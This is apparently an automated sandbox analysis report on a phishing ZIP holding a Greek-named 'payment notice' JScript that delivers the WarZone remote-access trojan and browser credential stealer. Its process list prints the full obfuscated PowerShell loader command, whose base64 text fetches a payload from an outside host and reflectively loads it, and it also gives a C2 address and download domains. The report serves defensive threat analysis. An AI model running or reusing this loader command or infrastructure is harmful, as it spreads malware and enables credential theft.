File name:

15052025_1700_13052025__7915322331.zip

Full analysis: https://app.any.run/tasks/bde12d7d-7aed-4fe5-9da4-f2fd243a9731
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 15, 2025, 17:11:13
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: arch-scr, susp-powershell, loader, reverseloader, payload, stealer, warzone, bazaloader
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5: A9850D7E26BCBBB62025C283C111768C
SHA1: E6A585141082FC76B215A2FF6FCBF2EE8CA79B5A
SHA256: F32C577CFD35F399BF0BC95F1011AEB4155F11314FC7D41C31D20ED616815A6D
SSDEEP: 192:Bk5P780PdE7g9hmYqucRxgSAczNfZwmhUwOxYc93fCKDF:iDK7g9hmfuciujwmLiF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Generic archive extractor
      • WinRAR.exe (PID: 4024)
    • Run PowerShell with an invisible window
      • powershell.exe (PID: 4688)
    • Downloads the requested resource (POWERSHELL)
      • powershell.exe (PID: 4688)
    • Dynamically loads an assembly (POWERSHELL)
      • powershell.exe (PID: 4688)
    • Actions look like stealing of personal data
      • RegSvcs.exe (PID: 5728)
    • WARZONE has been detected (YARA)
      • RegSvcs.exe (PID: 5728)
    • Steals credentials from Web Browsers
      • RegSvcs.exe (PID: 5728)
    • BAZALOADER has been detected (YARA)
      • RegSvcs.exe (PID: 5728)
  • SUSPICIOUS
    • The process bypasses the loading of PowerShell profile settings
      • wscript.exe (PID: 3884)
    • Uses base64 encoding (POWERSHELL)
      • powershell.exe (PID: 4688)
    • Possibly malicious use of IEX has been detected
      • wscript.exe (PID: 3884)
    • Starts POWERSHELL.EXE for commands execution
      • wscript.exe (PID: 3884)
    • Runs shell command (SCRIPT)
      • wscript.exe (PID: 3884)
    • Executes script without checking the security policy
      • powershell.exe (PID: 4688)
    • Probably obfuscated PowerShell command line is found
      • wscript.exe (PID: 3884)
    • Connects to unusual port
      • RegSvcs.exe (PID: 5728)
    • Executable content was dropped or overwritten
      • RegSvcs.exe (PID: 5728)
    • Process drops legitimate Windows executable
      • RegSvcs.exe (PID: 5728)
    • The process drops C-runtime libraries
      • RegSvcs.exe (PID: 5728)
    • The process drops Mozilla's DLL files
      • RegSvcs.exe (PID: 5728)
  • INFO
    • Disables trace logs
      • powershell.exe (PID: 4688)
    • Manual execution by a user
      • wscript.exe (PID: 3884)
    • Checks supported languages
      • RegSvcs.exe (PID: 5728)
    • Gets data length (POWERSHELL)
      • powershell.exe (PID: 4688)
    • Reads the machine GUID from the registry
      • RegSvcs.exe (PID: 5728)
    • Checks proxy server information
      • powershell.exe (PID: 4688)
      • slui.exe (PID: 976)
    • Reads the computer name
      • RegSvcs.exe (PID: 5728)
    • Found Base64 encoded reflection usage via PowerShell (YARA)
      • powershell.exe (PID: 4688)
    • Found Base64 encoded text manipulation via PowerShell (YARA)
      • powershell.exe (PID: 4688)
    • Creates files or folders in the user directory
      • RegSvcs.exe (PID: 5728)
    • Creates files in a temporary directory
      • RegSvcs.exe (PID: 5728)
    • The sample was compiled with English language support
      • RegSvcs.exe (PID: 5728)
    • Reads the software policy settings
      • slui.exe (PID: 976)
Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report

WarZone

(PID) Process: (5728) RegSvcs.exe
C2 (1): 196.251.115.121:4422
Build ID: TFHS94M973
Options:
Install Flag: False
Startup Flag: False
Reverse Proxy local port: 5000
Offline log: False
Persistence: False
UAC bypass: False
Defender bypass: False
Use ADS: False

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0800
ZipCompression: Deflated
ZipModifyDate: 2025:05:12 08:01:50
ZipCRC: 0xaabf1cbd
ZipCompressedSize: 11400
ZipUncompressedSize: 1574055
ZipFileName: Ειδοποίηση πληρωμής_79153 22331.JS
All screenshots are available in the full report
Total processes: 129
Monitored processes: 6
Malicious processes: 3
Suspicious processes: 0

Behavior graph

Processes shown in the graph (interactive view in the full report): start, winrar.exe (no specs), wscript.exe (no specs), powershell.exe, conhost.exe (no specs), regsvcs.exe (#WARZONE), slui.exe

Process information

PID: 976
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Activation Client
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\slui.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\advapi32.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\sechost.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\bcrypt.dll, c:\windows\system32\user32.dll

PID: 3884
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\Ειδοποίηση πληρωμής_79153 22331.JS"
Path: C:\Windows\System32\wscript.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.812.10240.16384
Modules (images): c:\windows\system32\wscript.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\oleaut32.dll, c:\windows\system32\msvcp_win.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\combase.dll, c:\windows\system32\rpcrt4.dll

PID: 3896
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\conhost.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\msvcp_win.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\shcore.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\combase.dll, c:\windows\system32\rpcrt4.dll

PID: 4024
CMD: "C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\15052025_1700_13052025__7915322331.zip
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User: admin
Company: Alexander Roshal
Integrity Level: MEDIUM
Description: WinRAR archiver
Version: 5.91.0
Modules (images): c:\program files\winrar\winrar.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\user32.dll, c:\windows\system32\win32u.dll, c:\windows\system32\gdi32.dll, c:\windows\system32\gdi32full.dll, c:\windows\system32\msvcp_win.dll, c:\windows\system32\ucrtbase.dll

PID: 4688
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$fructificative = 'JGdhbmdidXN0ZXJzID0gJ3R4dC5xam1hdWhzZWgvbW9jLmFpZG5pcmF2LmZlaWhjbGVubmFoYy8vOnNwdHRoJzskcGljbGUgPSAnaHR0cHM6Ly9vbmZpbHRyZS5jb20udHIvd3AtY29udGVudC9naXBoeS5naWYnOyRtaWNyb2xpdGhzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskbWljcm9saXRocy5IZWFkZXJzLkFkZCgnVXNlci1BZ2VudCcsJ01vemlsbGEvNS4wJyk7JHRpcHVsYSA9ICRtaWNyb2xpdGhzLkRvd25sb2FkRGF0YSgkcGljbGUpOyRhcmNoZW9sb2dpc3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkdGlwdWxhKTskY3liZXJzcGVlY2ggPSAnPDxzdWRvX3BuZz4+JzskZGlhbmRlciA9ICc8PHN1ZG9fb2R0Pj4nOyRiYW5pZSA9ICRhcmNoZW9sb2dpc3QuSW5kZXhPZigkY3liZXJzcGVlY2gpOyRzY29ybmZ1bCA9ICRhcmNoZW9sb2dpc3QuSW5kZXhPZigkZGlhbmRlcik7JGJhbmllIC1nZSAwIC1hbmQgJHNjb3JuZnVsIC1ndCAkYmFuaWU7JGJhbmllICs9ICRjeWJlcnNwZWVjaC5MZW5ndGg7JGNydW1taWVyID0gJHNjb3JuZnVsIC0gJGJhbmllOyRtaWxsaWxpdHJlcyA9ICRhcmNoZW9sb2dpc3QuU3Vic3RyaW5nKCRiYW5pZSwgJGNydW1taWVyKTskYXlvbmQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtaWxsaWxpdHJlcyk7JHNhd2hvcnNlID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYXlvbmQpOyRMYXZlcm5hID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJykuSW52b2tlKCRudWxsLCBbb2JqZWN0W11dIEAoJGdhbmdidXN0ZXJzLCcnLCcnLCcnLCdSZWdTdmNzJywnJywnJywnJywnJywnQzpcVXNlcnNcUHVibGljJywnYWRkcmVzcycsJ2pzJywnJywnJywnZGlzcGxheWFibGUnLCcyJywnJykp' -replace '','';$deedless = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($fructificative));Invoke-Expression $deedless;"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wscript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\windowspowershell\v1.0\powershell.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\oleaut32.dll, c:\windows\system32\msvcp_win.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\combase.dll, c:\windows\system32\rpcrt4.dll

PID: 5728
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft .NET Services Installation Utility
Version: 4.8.9037.0 built by: NET481REL1
Modules (images): c:\windows\microsoft.net\framework\v4.0.30319\regsvcs.exe, c:\windows\system32\ntdll.dll, c:\windows\syswow64\ntdll.dll, c:\windows\system32\wow64.dll, c:\windows\system32\wow64win.dll, c:\windows\system32\wow64cpu.dll, c:\windows\syswow64\kernel32.dll, c:\windows\syswow64\kernelbase.dll, c:\windows\syswow64\bcrypt.dll, c:\windows\syswow64\user32.dll
Total events: 10 525
Read events: 10 514
Write events: 11
Delete events: 0

Modification events

(PID) Process: (4024) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory | Operation: write | Name: 3 | Value: C:\Users\admin\Desktop\preferences.zip
(PID) Process: (4024) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory | Operation: write | Name: 2 | Value: C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process: (4024) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory | Operation: write | Name: 1 | Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process: (4024) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory | Operation: write | Name: 0 | Value: C:\Users\admin\Desktop\15052025_1700_13052025__7915322331.zip
(PID) Process: (4024) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths | Operation: write | Name: name | Value: 120
(PID) Process: (4024) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths | Operation: write | Name: size | Value: 80
(PID) Process: (4024) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths | Operation: write | Name: type | Value: 120
(PID) Process: (4024) WinRAR.exe | Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths | Operation: write | Name: mtime | Value: 100
(PID) Process: (3884) wscript.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe | Operation: write | Name: JScriptSetScriptStateStarted | Value: 2DDE100000000000
(PID) Process: (5728) RegSvcs.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | Operation: write | Name: MaxConnectionsPer1_0Server | Value: 10
Executable files: 6
Suspicious files: 6
Text files: 2
Unknown types: 0

Dropped files

PID | Process | Filename | Type
5728 | RegSvcs.exe | C:\Users\admin\AppData\Roaming\igcnrvf.tmp | binary
  MD5: 29A644B1F0D96166A05602FE27B3F4AD
  SHA256: BF96902FEB97E990A471492F78EE8386BCF430D66BDAEFDEAFBF912C8CF7CE46
5728 | RegSvcs.exe | C:\Users\admin\AppData\Roaming\.sbapeh.tmp | binary
  MD5: A45465CDCDC6CB30C8906F3DA4EC114C
  SHA256: 4412319EF944EBCCA9581CBACB1D4E1DC614C348D1DFC5D2FAAAAD863D300209
4688 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ejvnx4jv.vz5.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5728 | RegSvcs.exe | C:\Users\admin\AppData\Local\Temp\softokn3.dll | executable
  MD5: 471C983513694AC3002590345F2BE0DA
  SHA256: BB3FF746471116C6AD0339FA0522AA2A44A787E33A29C7B27649A054ECD4D00F
5728 | RegSvcs.exe | C:\Users\admin\AppData\Roaming\Dinoljv.tmp | binary
  MD5: DC9ADB7DE19A6753CE90AE94738BFDEF
  SHA256: 884B04032E2E70A002956218E8EC3491F2B753C4596CEE6E4894DC49AFA0A681
5728 | RegSvcs.exe | C:\Users\admin\AppData\Local\Temp\vcruntime140.dll | executable
  MD5: 7587BF9CB4147022CD5681B015183046
  SHA256: C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
5728 | RegSvcs.exe | C:\Users\admin\AppData\Local\Temp\mozglue.dll | executable
  MD5: 75F8CC548CABF0CC800C25047E4D3124
  SHA256: FB419A60305F17359E2AC0510233EE80E845885EEE60607715C67DD88E501EF0
5728 | RegSvcs.exe | C:\Users\admin\AppData\Roaming\sxxyk.A.tmp | binary
  MD5: 414B7F9E82EE13FB08D39D366B2FBEC8
  SHA256: 6F9AD831D38FF839C0EE3593CC5452D7BE31D9725EE81D3E7AD20E4D91736971
4688 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xrnzjwip.spp.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5728 | RegSvcs.exe | C:\Users\admin\AppData\Local\Temp\msvcp140.dll | executable
  MD5: 109F0F02FD37C84BFC7508D4227D7ED5
  SHA256: 334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
Download the PCAP, analyze network streams, HTTP content and a lot more in the full report
HTTP(S) requests: 9
TCP/UDP connections: 54
DNS requests: 19
Threats: 7

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2104 | svchost.exe | GET | 200 | 2.19.11.120:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | - | - | whitelisted
2104 | svchost.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | - | - | whitelisted
6964 | SIHClient.exe | GET | 200 | 2.19.11.120:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl | unknown | - | - | whitelisted
6964 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl | unknown | - | - | whitelisted
6964 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl | unknown | - | - | whitelisted
6964 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.2.crl | unknown | - | - | whitelisted
6964 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl | unknown | - | - | whitelisted
6964 | SIHClient.exe | GET | 200 | 2.19.11.120:80 | http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl | unknown | - | - | whitelisted
6964 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | - | - | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
2104 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
- | - | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
- | - | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
2104 | svchost.exe | 2.19.11.120:80 | crl.microsoft.com | Elisa Oyj | NL | whitelisted
2104 | svchost.exe | 2.23.246.101:80 | www.microsoft.com | Ooredoo Q.S.C. | QA | whitelisted
6544 | svchost.exe | 40.126.31.71:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
3216 | svchost.exe | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
4688 | powershell.exe | 95.173.189.182:443 | onfiltre.com.tr | Netinternet Bilisim Teknolojileri AS | TR | suspicious

DNS requests

Domain | IP | Reputation
google.com | 142.250.185.78 | whitelisted
client.wns.windows.com | 172.211.123.250, 172.211.123.248 | whitelisted
crl.microsoft.com | 2.19.11.120, 2.19.11.105 | whitelisted
www.microsoft.com | 2.23.246.101, 95.101.149.131 | whitelisted
login.live.com | 40.126.31.71, 20.190.159.129, 20.190.159.131, 40.126.31.130, 40.126.31.128, 20.190.159.4, 40.126.31.129, 40.126.31.73 | whitelisted
onfiltre.com.tr | 95.173.189.182 | unknown
settings-win.data.microsoft.com | 20.73.194.208, 4.231.128.59 | whitelisted
channelchief.varindia.com | 103.249.97.230 | unknown
slscr.update.microsoft.com | 4.175.87.197 | whitelisted
fe3cr.delivery.mp.microsoft.com | 52.165.164.15 | whitelisted

Threats

PID | Process | Class | Message
- | - | Misc activity | INFO [ANY.RUN] USER_AGENTS Suspicious User-Agent (Mozilla/5.0)
- | - | Exploit Kit Activity Detected | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound
- | - | Exploit Kit Activity Detected | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1
- | - | Exploit Kit Activity Detected | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2
- | - | Potentially Bad Traffic | PAYLOAD [ANY.RUN] Reverse Base64 Encoded EXE Inbound
- | - | A Network Trojan was detected | ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound
5728 | RegSvcs.exe | Misc Attack | ET DROP Spamhaus DROP Listed Traffic Inbound group 41